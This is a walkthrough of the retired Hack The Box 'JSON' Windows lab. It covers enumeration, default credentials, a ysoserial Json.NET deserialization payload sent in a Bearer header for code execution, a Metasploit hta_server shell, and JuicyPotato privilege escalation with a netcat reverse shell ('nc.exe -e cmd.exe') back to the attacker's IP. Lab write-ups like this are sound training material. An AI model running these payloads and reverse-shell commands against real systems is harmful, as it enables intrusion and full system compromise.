Hackthebox - Retired - JSON

As always I start with a simple up/down scan on all TCP ports for a staged scan

nmap -T4 -p- -oX ./nmapb.xml 10.10.10.158

Then I convert the output to HTML

# xsltproc ./nmapb.xml -o ./nmapb.html

That's a lot of open ports

Lets scan just those ports with the -A switch to finger os/services

# nmap -T4 -p21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,4915 -A -oX ./nmapf.xml 10.10.10.158

Then convert that to HTML

# xsltproc ./nmapf.xml -o ./nmapf.html

Looks like we got a windows box with a Filezilla FTP on 21, IIS on 80 and netbios/smb, with RPC on 5985

Let's start poking around.

SMB is open but no shares for anonymous

Same story for FTP

At least 80 is open, there is a page displayed briefly then it redirects to this login page

Same old song for rpc

Dirb found

r oot@kali:~/Desktop/HTB/json# dirb http://10.10.10.158

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Thu Jan 30 21:54:09 2020

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

Dirbuster found this password.txt file

It also found

/api/token

/api/account

Exploit

So guess what the login creds for the website are??

admin/admin





But more importantly we caught this in burp

eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=;

Let's unpack that base64

# echo "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" | base64 -d

{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"

Username: admin

Password: 21232f297a57a5a743894a0e4a801fc3

Cool, so after we auth correctly we get a cookie back that saves our auth session for us.

I tried in the browser going to json.htb/api/account that we found earlier and caught this in burp

If i repeat this same request in burpsuite's repeater we get some json looking data back

So we have a new header present name bearer with the same base64 encoded thing as our cookie. This looks like a call into the API that we can hopefully leverage.

So now we move to see if this is vulnerable to a Deserialization attack.

Here is a write up about deserialization

The idea with json is that you can send and receive data in a specified format. What we are hoping here is the webapp accepts this data without sanitizing or checking it first. Which we can use to get RCE on the box.

There were some talks at blackhat a while back focusing on this attack vector

I found a tool that will format our commands and base64 encode them so we can send a get request to the webapp and hope that it runs our code for us.

This is a windows exe so I had to fire up a windows VM, and build the app from the code using visual studios.

Now that we have the exe let's see what we can do with it

I just want to start with a POC to see if I can get the box to ping my VPN IP

There are 11 different Gadgets we can utilize in the tool to generate our payload

The first thing I did was write out a little batch script to make each of the payloads for me and load them up in burp to see if we get anything back

ysoserial.exe -f BinaryFormatter -g ObjectDataProvider -c "ping 10.10.14.25" -o base64

My batch script generated with the binaryformatter since all the gadgets could use this format. I also base64 encoded it so I could just copy and paste in to burp

Let's set our machine to listen to incoming pings

tcpdump -i tun0 -n icmp

This command basically says listen on my tun0 interface and only let me know about ICMP packets.

So in my repeater, I just copied the outputs from ysoserial in to the bearer header and hit send and waited to see if i got any pings

Here is what the first payload looked like

I tried all 10 ( one of them required an input file )

No love

Looking through the other available formatters that the gadgets can use, one stood out pretty quickly ( don't know why I didn't see it before )

JSon.net we are working with json lets try that one

Only 3 of the gadgets could use this formatter

ObjectDataProvider

WindowsClaimsIdentity

WindowsIdentity

So I generated a new json payload for all three of these gadgets and tried them

The last one is WindowsIdentity….

Well we finally got some love

Yay!!!

Ok looks like we can use this deserialization attack to hopefully get somewhere on this box.

Alright let's use mshta to get us a shell

First we need to setup our msfconsole

Msfconsole

use exploit/windows/misc/hta_server

Let's check our options

Let's set srvhost to our VPN IP

set srvhost 10.10.14.25

I have a feeling this is x64 so let's see what options we have for target.

We want to change this to x64

set target 1

And lets run

Ok there is an lhost we need to set to, one of these days I'll learn how to check this before I execute.

set lhost 10.10.14.25

Run

Oi our port is still open somewhere else, let's change that too

Set lport 4445

Will it run now?

Happy dance!!!

We got a shell

Sessions 1

Let's get that user.txt file

Let's escalate

My plan is to use juicy potato and netcat to get a privileged shell back

First let's serve up potato.exe and nc.exe to the Json.HTB box

# python -m SimpleHTTPServer 8888

This is ran from my payloads directory which contains both juicypotato.exe and nc.exe

Then we use certutil to download the files to the tmp directory on json.htb

Now on json.htb I'll make new bat file that will call my reverse shell to my attacking computer using nc.exe

C:\tmp>echo C:\tmp

c.exe -e cmd.exe 10.10.14.25 4445 > revshell.bat

Let's setup our nc listener on our attacking machine to grab this connection when we execute on json.htb

Now let's launch potato and have it use the new reverseshell.bat to escalate

C:\tmp>potato.exe -p C:\tmp\revshell.bat -l 4445 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

Looks like it worked. Let's check out our nc listener to see if we have the connection

And what user are we now? it should be system according to the potato output

Let's get that root hash now

C:\Users\superadmin\Desktop>type root.txt

type root.txt

3cc8*****************************



